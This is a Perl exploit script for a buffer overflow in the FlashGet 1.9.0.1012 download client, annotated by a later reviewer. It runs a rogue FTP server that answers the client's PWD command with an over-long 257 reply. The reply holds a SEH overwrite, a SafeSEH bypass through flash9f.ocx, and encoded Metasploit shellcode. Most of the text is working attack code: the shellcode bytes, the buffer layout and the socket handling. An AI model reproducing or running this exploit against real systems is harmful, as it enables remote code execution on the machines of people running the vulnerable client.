FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (SafeSEH bypass)

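#!/usr/bin/perl
#
# FlashGet 1.9.0.1012 - FTP "PWD" (257) response buffer overflow, SEH overwrite.
#
# k`sOSe 08/17/2008
#
# SafeSEH is bypassed by pointing the overwritten handler into flash9f.ocx,
# which was not linked with /SAFESEH.  The script below acts as a rogue FTP
# server and hands the client an over-long 257 reply.
#
# NOTE(review): the listing this file was recovered from had every "\x" escape
# and most line breaks stripped (and "use warnings;" had been folded into a
# comment).  Escapes are restored here so the strings hold raw bytes rather
# than the literal text "x31"; the byte values themselves are unchanged.

use strict;
use warnings;

use IO::Socket;

# Payload: Metasploit win32_exec - EXITFUNC=seh CMD=calc Size=160
# Encoder=PexFnstenvSub (http://metasploit.com).  160 bytes.  Per the encoder
# name, the leading bytes are a self-decoding stub that unpacks the rest in
# place, so the buffer must be sent contiguous and unmodified.
my $shellcode =
    "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b" .
    "\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55" .
    "\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59" .
    "\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d" .
    "\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76" .
    "\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34" .
    "\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b" .
    "\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78" .
    "\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14" .
    "\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";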

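# Rogue FTP server.
#
# Listens on BIND_ADDR:PORT taken from the command line (defaults: every
# interface, port 21 -- binding 21 needs root on Unix, and 0.0.0.0 exposes the
# listener to every network you are on, so pass an explicit address when you
# can).  Walks one client through a minimal USER/PASS/CWD exchange without
# checking what it sends, answers its PWD with the malicious 257 reply, then
# exits.  Exactly one client is ever served.
my $bind_addr = $ARGV[0] || '0.0.0.0';
my $bind_port = $ARGV[1] || 21;

my $sock = IO::Socket::INET->new(
    LocalAddr => $bind_addr,
    LocalPort => $bind_port,
    Listen    => 1,
    Reuse     => 1,
) or die "cannot listen on $bind_addr:$bind_port: $@";

print "[*] listening on $bind_addr:$bind_port\n";

while (my $csock = $sock->accept()) {
    print {$csock} "220 Hello ;)\r\n";
    read_sock($csock);                          # client's USER (not checked)
    print {$csock} "331 pwd please\r\n";
    read_sock($csock);                          # client's PASS (not checked)
    print {$csock} "230 OK\r\n";
    read_sock($csock);                          # client's CWD (not checked)
    print {$csock} "250 CWD command successful.\r\n";
    read_sock($csock);                          # client's PWD -> trigger
    print {$csock} build_pwd_reply();
    close($csock);
    exit;
}

# Builds the malicious 257 (PWD) reply.  The quoted "current directory" is:
#   324 x "A"          - filler up to the SEH record on the stack
#   "\xEB\x06\x90\x90" - next-SEH field: jmp short +6, skips over the handler
#                        pointer and lands on the shellcode
#   "\x82\x01\x02\x30" - handler: pop/pop/ret at 0x30020182 inside flash9f.ocx
#                        (module not built with /SAFESEH).  This address is
#                        specific to that build of the control; re-check it
#                        against the target's copy before use.
#   $shellcode         - decoder stub + payload (file-scoped, defined above)
#   840 x NOP          - trailing padding; the original gives no reason for
#                        it, presumably to push the reply past the length that
#                        triggers the overflow -- TODO confirm
sub build_pwd_reply {
    my $path = "\x41" x 324
             . "\xEB\x06\x90\x90"
             . "\x82\x01\x02\x30"
             . $shellcode
             . "\x90" x 840;
    return "257 " . "\x22" . $path . "\x22" . " is current directory.\r\n";
}

# Reads one line from the client and echoes it to stdout so the exchange can
# be followed.  Returns the line, or undef when the peer closed the connection
# before sending one (the original printed an uninitialized value there).
sub read_sock {
    my ($client) = @_;
    my $line = <$client>;
    if (!defined $line) {
        print "[client] -> <connection closed>\n";
        return;
    }
    print "[client] -> $line";
    return $line;
}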